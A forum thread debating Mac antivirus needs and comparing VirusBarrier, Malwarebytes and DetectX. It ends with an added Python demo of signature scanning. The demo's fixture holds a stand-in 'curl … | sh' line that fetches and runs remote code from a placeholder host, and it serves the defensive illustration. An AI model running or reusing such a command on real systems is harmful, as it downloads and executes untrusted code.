Malware Scanning

I often hear people refer to third party commercial anti-virus software as “insurance”. The thing is, you don’t always need insurance. Not all possible eventualities are equal. When that volcano insurance salesman comes by, you may not want to give him or her a lot of your time…or money.

Here’s the deal. I don’t want anyone to get the impression that there is no malware for the Macintosh, or that I’m saying that there is none. I haven’t counted manually, but the archive of Mac malware examples that the consortium of anti-virus software manufacturers use has fewer than 200 examples, all of which have accrued since the advent of OS X, over 20 years ago. The thing is that just about all of those examples, at this time, either don’t work, or they don’t exist in the wild anymore, or the Macintosh has been hardened against them, or a combination of these. There just isn’t a lot of malware for the Macintosh. (The popular press has folks scared to death about malware. But that’s because they are talking about Windows, not the Mac. There are over a BILLION examples of malware for Windows. Windows users SHOULD be scared. But the Macintosh isn’t Windows.)

It isn’t that the Macintosh is “invulnerable”, it is that writing malware for the Macintosh is very hard… and expensive.

Modern malware is almost exclusively written for financial gain. (With the odd bit of malware written to target a particular socio-political group, usually in the far east. These exploits usually aren’t seen in the west.) Whether it is to serve up ads, or to scam users out of their money, it is all about a profit motive.

The Mac isn’t easy to write malware for. The Mac OS was designed for security, and Apple has been adding more and more layers of security with each new version over the past 20+ years. So, it takes a significant amount of time and money to write viable malware for the Macintosh. It’s not an endeavor for sociopathic teens with too much time on their hands as it often is for Windows. This means that it will take months to push out a new exploit for the Mac, representing a large investment in time and money. (I’ve heard speculation that it might take millions of dollars to write some types of common malware for the Mac.)

So, the bad guys need to create malware that will bring a large return on investment that will recoup their costs, and then some. The thing is, Apple has shown that they will reasonably quickly harden the Macintosh to any new malware. Plus, since it apparently has proven to be exceedingly difficult to write actual viruses (i.e. self-propagating/disseminating malware) for the Mac, any malware written for the Mac will almost certainly be a Trojan Horse that will be very difficult to disseminate to a large audience (because it is very difficult to spread a Trojan Horse anonymously and avoid prison) before the source that is disseminating it is discovered and shut down.

What that all means is that even if the bad guys can write effective malware for the Mac, it might turn out in the end that the entire endeavor is a money loser for them. This tends to make the Macintosh an unattractive target for sophisticated malware. As a result, we don’t see a lot of malware written for the Macintosh.

I want to note that I’m on about half a dozen large Macintosh discussion forums. These comprise well over a quarter million Mac users. NO ONE on these forums is complaining about losing data or money to some virulent malicious malware, or any other sort of security breach. Ironically, the closest thing to that I see is a few people have been experiencing scary notifications imploring them to renew fictitious subscriptions to McAfee AV software.

If you are paranoid, and you feel that Apple’s built-in security features aren’t sufficient, I’ve already mentioned earlier in this thread several excellent tools that you can use to assuage your fears…all of which are free. You don’t need to be cheated out of your money by some company that makes Windows anti-virus software which they have crudely ported to the Macintosh.

1 Like

Targeted malware does seem to be more prevalent today than in the past. And I disagree that the Mac is an unattractive target - the profile of Apple users seems to be that they have money, or they have access to information.

But, malware isn’t just going after your money although that’s the primary driver. If you deal with PII, industrial or government secrets, or financial information, that’s valuable too. You also can’t dismiss the use of your system to “springboard” to other targets (within your employer).

Then there’s “state sponsored surveillance” - although in practice most of us don’t have to worry about that, but if you’re a political dissident you could be a target. Or if you are a government official. Or military. Or defense contractor.

You’re correct that you have to assess your own level of risk (based on not only what you own but what data you have access to). If that level of assessment leads you to find that you need more thorough protection, you need to look at:

  • Reducing the attack surface of the system. That involves disabling unnecessary services, no sharing, controlling admin access, and controlling at the system level that only certain things can get executed. Apple’s built-in defenses work at this level, but don’t catch everything (riddle me this: why would we have zero-day exploits if these defenses were 100% effective?).

  • Use AV software that does active scanning as items are downloaded to the system. You can’t rely on software that only does intermittent scanning. It’s like locking the barn door after the horse escapes. Malware usually doesn’t wait to activate itself - by the time you decided to start a manual scan (or wait for your scheduled scan to run), you may have already been compromised. Your “scan” process now becomes a search and destroy, or in the case of ransomware, restoration process.

Defense in depth - that’s what I’ve always been taught from a security best practice. Assess risk and select the best tools. That may mean using multiple tools (network controls, firewalls, AV, etc). And don’t forget the human aspect - many times it’s the loose nut holding the wheel that’s the biggest problem.

1 Like

No disagreement here, but I’d point out that for most people, this high-value information belongs to their employers.

Nobody should be putting corporate data on personal computers, and most corporations have policies that explicitly forbid it. And a major reason for policies like this is that these same corporations have IT policies that are much more restrictive than people would want to have on their personal computers.

I think that a corporate IT department needs to be extremely paranoid. But ordinary people under ordinary circumstances shouldn’t have to be. But they shouldn’t be putting sensitive documents on less-secure computers either.

1 Like

Agreed 100%. The misguided “bring your own device” mandates (employers trying to cut costs by requiring tools but not paying for them) and work from home trends are making this more likely to happen, though - corporate policies or not.

But that’s a training and awareness issue on both employees and companies.

1 Like

There is, I think, an elephant here, something that continuously fails to be addressed: how to recover from accidents. And especially unknown accidents, the ones you didn’t know you had. All the discussion on malware/adware seems to set such a high bar: that people will of course be diligent, cautious and conscientious and “there’s no reason to worry if you’re halfway not an idiot,” etc.

This is not real world thinking. Accidents do happen using computers just as they do driving vehicles. Over time, they will happen. Some machines and systems are more robust than others, but accidents… Driver error, or a lapse of attention, or going too fast, is a real thing.

So what about people who might have made a mistake, who might have accidentally allowed access to their computer and that person wasn’t as careful (e.g., as happens in families)? At work we build plenty of fail-safes and security traps; not so at home. Granted, a company is not lost or big bucks or data breach, but what kind of thinking is that? A company is more important than an individual or single family?

Authors of general-public articles and the resulting correspondence often adopt such ivory-castle positions, or “speaking to the choir,” getting carried away mildly chastising each other but ignoring what isn’t being addressed: that life has accidents (professional life not excluded). People make mistakes. Insurance is nice but so are mechanics and auto body shops.

So those are the situations when you want to use programs such as the ones Randy2 so helpfully suggests here.

2 Likes

Yes, we are all human and we will make mistakes, especially when we are in a rush, distracted, or tired. Relying on constant vigilance as protection requires perfection. I don’t think any of us can reach that standard very often, especially with something that is constantly changing and morphing.

2 Likes

For that reason, some people choose to run Intego’s free version of Virus Barrier daily, or weekly, or monthly, depending on how insecure they are. Yet I never hear reports of anyone having found that something serious slipped through.

I know that malware is a very big issue for some folks. It’s hard to ignore the fact that there are over a BILLION pieces of malware for Windows. That entire offices are sometimes ravaged by Windows malware. That’s scary stuff. But, really, the Macintosh is not Windows. The Mac has only a relative handful of malware, just about none of which is a threat at this time.

But if you are paranoid, Intego’s free version of Virus Barrier is right there. Use it as often as you care to, to assure yourself that your Mac is just fine. Set it to run daily if you like. Since it isn’t fully interactive, it won’t slow down your Mac like many commercial anti-virus programs will. And it’s not costing you anything. So go ahead and use it. You don’t have to keep coming up with rationalizations why you feel that you need more protection than the OS itself offers. No one blames you for being concerned, we understand.

VirusBarrier Free Edition (free)
https://itunes.apple.com/us/app/VirusBarrier-Scanner/id1200445649

3 Likes

Better still, purchase the Intego program. It is well worth the cost. I have used it for years and sleep well at night knowing it is working lol. Also, I have had just a couple of times over the years where it has caught something and allowed me to delete the questionable item. That item was nothing I had intentionally downloaded but was something attached to a document or program I had downloaded. They are fantastic and their regular updates and informational e-mails are very helpful to me. I figure my subscription helps to fund their excellent work.

Lots of good information in this thread so thanks to all who have contributed! TidBITS comes through again :smiley:

2 Likes

I agree that it is an excellent program. It is one of the very few anti-virus programs that comes from a company that specializes in Macintosh software, and really understands the Mac. And it has won all of the believable shootouts that I’ve seen from reputable sources.

However, I’ve been using the commercial version for over 20 years (not because I think that I need it. I don’t think that I do at all. But I work in a profession that requires me to use “best efforts” to protect client data). In all that time it has never “saved” me from anything that I needed saving from. The threats just aren’t out there that require one to throw money at protection. The free version of Virus Barrier is already more than what one needs.

That said, I know that there are folks who are dying to buy a commercial anti-virus program, no matter what argument you make about them not needing one. For those folks, Intego’s Virus Barrier is the best choice. It’s on sale for $70 (for one year) right now:

https://www.intego.com/

2 Likes

I believe the same could be said for Malwarebytes (free version). Could you comment on pros and cons between these two for somebody who comes from “I’m careful and not at risk, but every once in a while I like some assurance”?

4 Likes

This is a touchy subject, because I personally don’t trust Malwarebytes. Others will strenuously defend the product, but they haven’t been able to change my perception.

The short and inarguable answer is that all of the believable anti-virus comparison tests have Virus Barrier at the very top, and Malwarebytes somewhere lower. Sometimes quite a bit lower.

https://www.macworld.com/article/668850/best-mac-antivirus-software.html

Personally, I don’t like some of Malwarebytes’ past dishonest advertising, and I don’t like that at least some versions of Malwarebytes install adware to hawk their commercial version (I was getting pop-ups for their commercial version). I don’t like the fact that Malwarebytes installs a large number of files deep in your system (I counted 22 different files that EasyFind uncovered in mine; what might they all be doing?). And I don’t like the fact that the product would do a scan of my half full 1TB rotating disk hard drive in about 17 seconds, yet they claim that the product does a comprehensive scan looking everywhere for malware (which sounds physically impossible; other products will take up to several hours to do the same. My suspicion is that the product only does a superficial scan looking for certain file names in certain locations.)

I also don’t like that Malwarebytes has removed the last comparison test that I really trusted from the Web, as they purchased TheSafeMac’s IP. But you can still call it up from here:

https://web.archive.org/web/20230909150005/http://www.thesafemac.com/mac-anti-virus-testing-2014/
(Scroll down to the table showing the effectiveness of each product. Note that Virus Barrier is at the top.)

Malwarebytes does an excellent job with adware, which traditional AV products, and even Apple’s own security software, often don’t. But since I don’t recommend Malwarebytes myself, in the rare event that you find yourself plagued with adware, I recommend this almost identical free product instead:

DetectX Swift (free)
https://sqwarq.com/detectx/

1 Like

I think this statement is based on a misunderstanding. Malwarebytes has never claimed to do a “comprehensive scan looking everywhere”. On the Mac platform, they only scan the locations known to be attacked by the malware in their database.

See: Malwarebytes support: Why Malwarebytes scans so fast on Mac devices

You may not agree with this policy (I assume you do not), but it is not trying to scan every file and reviewers should not assume otherwise.

1 Like

Exactly. Even though the product is marketed as a comprehensive anti-malware product (or, at least, it has been previously), the product only seems to be doing a very superficial scan for a limited set of malware based on likely very limited parameters. It isn’t really a comprehensive product like Virus Barrier.

Which is not to say that the product doesn’t do anything, or that it isn’t nice considering that it is a free product. It just isn’t nearly as good (i.e. comprehensive and effective) a free product as Virus Barrier is. Which is the answer to the question that Simon asked.

1 Like

I think this is a matter of opinion.

I think they would argue that a piece of malicious code that isn’t installed (e.g. a malicious browser add-on that isn’t installed in your browser) is not dangerous, so there’s no point in scanning for it in other locations.

And yes, the (also completely valid) counter-arguments are:

  • They need to keep up to date about the various contexts (browsers, office suites, etc.) where malware might run. These locations change over time as apps change.
  • Malware stored in a generic file may not be able to run, but you should still know about it, since it may be possible for you to spread it to others (perhaps on other operating systems) even if it can’t hurt you directly.

Whether or not this matters is going to depend on your particular requirements and opinions. While I may consider a policy like this fine for my personal computer, I may consider it woefully inadequate for someone who is less careful, or as a corporate IT policy or for a computer that is more likely to be targeted for attack.

2 Likes

My counter argument is that it would be trivially easy for the sociopaths who write malware to totally bypass having Malwarebytes flag their malware by simply changing its name or stashing it somewhere else.

Given that the Mac OS already looks for and protects against malware, anyone who is interested in a third party product is likely going to want something that offers protection over and above what is already provided by Apple. Malwarebytes is not such a product; it only does a limited, superficial job. Fortunately there is another free product that does a very comprehensive job: Virus Barrier.

I just don’t see any of your rationalizations for Malwarebytes limitations (not to mention my other concerns, as mentioned previously) as convincing that the product fills a niche for anyone who is seriously concerned about malware.

I don’t see any point to arguing about this any further. I think that folks have enough information to make up their own minds.

1 Like
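The last few posts argue about two scanning strategies: checking only the locations where known malware is expected to land, versus hashing every file on the disk. The following is an added example, written for this page and not code from the thread, from Malwarebytes, or from Intego. It builds a constructed home directory in a temporary folder, plants a harmless stand-in "payload" in a launch-agent directory and a renamed copy of it in Downloads, and runs both strategies over it with a toy SHA-256 signature set. The directory names under KNOWN_LOCATIONS, the file names and the payload bytes are all assumptions made for the demonstration.

```python
"""Location-limited vs. full-tree hash scanning (constructed demo)."""
import hashlib
import os
import tempfile
from pathlib import Path

# Constructed "signature database": SHA-256 digests of known-bad file
# contents. The payload below is a harmless stand-in, not a real sample.
BAD_CONTENT = b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\n"
SIGNATURES = {hashlib.sha256(BAD_CONTENT).hexdigest(): "ToyDownloader"}

# Directories (relative to the scan root) that a location-limited scanner
# checks. They mirror common macOS persistence points but are assumed for
# this example; the scan root is a temp directory, not a real home folder.
KNOWN_LOCATIONS = ("Library/LaunchAgents", "Library/LaunchDaemons")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_dirs(root: Path, rel_dirs) -> tuple:
    """Hash every regular file under the given directories.

    Returns ({relative_path: family}, files_read). files_read is the cost
    of the scan; hits are keyed by forward-slash paths relative to root.
    """
    hits, files_read = {}, 0
    for rel in rel_dirs:
        base = root / rel
        if not base.is_dir():
            continue
        for dirpath, _dirs, files in os.walk(base):
            for name in files:
                p = Path(dirpath) / name
                if not p.is_file():
                    continue
                files_read += 1
                family = SIGNATURES.get(sha256_file(p))
                if family:
                    hits[p.relative_to(root).as_posix()] = family
    return hits, files_read


def scan_known_locations(root: Path) -> tuple:
    """Strategy 1: only the directories malware is known to use."""
    return scan_dirs(root, KNOWN_LOCATIONS)


def scan_full(root: Path) -> tuple:
    """Strategy 2: walk the whole tree (root / "" is root itself)."""
    return scan_dirs(root, ("",))


def build_sample_tree(root: Path) -> None:
    """Constructed home directory: one sample in a persistence location,
    the same bytes renamed and dropped into Downloads, and two benign files."""
    files = {
        "Library/LaunchAgents/com.example.helper.sh": BAD_CONTENT,
        "Downloads/invoice.pdf.sh": BAD_CONTENT,  # relocated and renamed
        "Library/LaunchAgents/com.benign.plist": b'<plist version="1.0"/>\n',
        "Documents/notes.txt": b"nothing to see here\n",
    }
    for rel, data in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)


def compare_scans() -> dict:
    """Run both strategies over the constructed tree and report hits and cost."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        limited_hits, limited_reads = scan_known_locations(root)
        full_hits, full_reads = scan_full(root)
    return {
        "limited": sorted(limited_hits),
        "limited_reads": limited_reads,
        "full": sorted(full_hits),
        "full_reads": full_reads,
    }


if __name__ == "__main__":
    for key, value in compare_scans().items():
        print(f"{key}: {value}")
```

Running it shows both sides of the argument at once: the hash match catches the sample in Library/LaunchAgents whatever it is called, so a simple rename does not evade a content signature, but the copy stashed in Downloads is only found by the full walk, which also has to read every file on the disk, which is where the difference in scan time comes from. A content hash is the simplest possible signature; changing even one byte of the payload defeats it, which is why real scanners add pattern rules and heuristics on top.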

Yep, let’s shut this down—we’ve covered the topic thoroughly.

2 Likes